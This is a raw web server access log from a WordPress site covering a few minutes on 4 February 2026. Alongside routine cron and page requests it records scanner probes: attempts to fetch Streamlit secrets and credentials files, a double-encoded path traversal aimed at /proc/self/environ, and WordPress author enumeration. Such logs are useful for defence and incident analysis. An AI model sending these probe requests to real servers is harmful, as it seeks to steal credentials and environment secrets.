204.76.203.210 - - [04/Feb/2026:23:28:07 +0800] "GET /.streamlit/config.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
36.133.115.36 - - [04/Feb/2026:23:28:08 +0800] "POST /wp-cron.php?doing_wp_cron=1770218888.6586511135101318359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.210 - - [04/Feb/2026:23:28:08 +0800] "GET /app/.streamlit/secrets.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:09 +0800] "GET /home/appuser/.streamlit/secrets.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:14 +0800] "GET /.streamlit/credentials.toml HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:20 +0800] "GET /@fs/proc/self/environ?raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.210 - - [04/Feb/2026:23:28:29 +0800] "GET /@fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw?? HTTP/1.1" 301 5 "-" "Mozilla/5.0"
204.76.203.219 - - [04/Feb/2026:23:28:32 +0800] "GET / HTTP/1.1" 200 34752 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Feb/2026:23:31:18 +0800] "POST /wp-cron.php?doing_wp_cron=1770219078.3352489471435546875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
146.19.24.133 - - [04/Feb/2026:23:31:18 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
35.190.196.120 - - [04/Feb/2026:23:34:36 +0800] "GET / HTTP/1.1" 200 158943 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.190.196.120 - - [04/Feb/2026:23:34:37 +0800] "GET / HTTP/1.1" 200 158943 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
36.133.115.36 - - [04/Feb/2026:23:34:38 +0800] "POST /wp-cron.php?doing_wp_cron=1770219278.5592069625854492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
35.190.196.120 - - [04/Feb/2026:23:34:38 +0800] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.190.196.120 - - [04/Feb/2026:23:34:39 +0800] "GET /?author=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.190.196.120 - - [04/Feb/2026:23:34:40 +0800] "GET /?author=2 HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
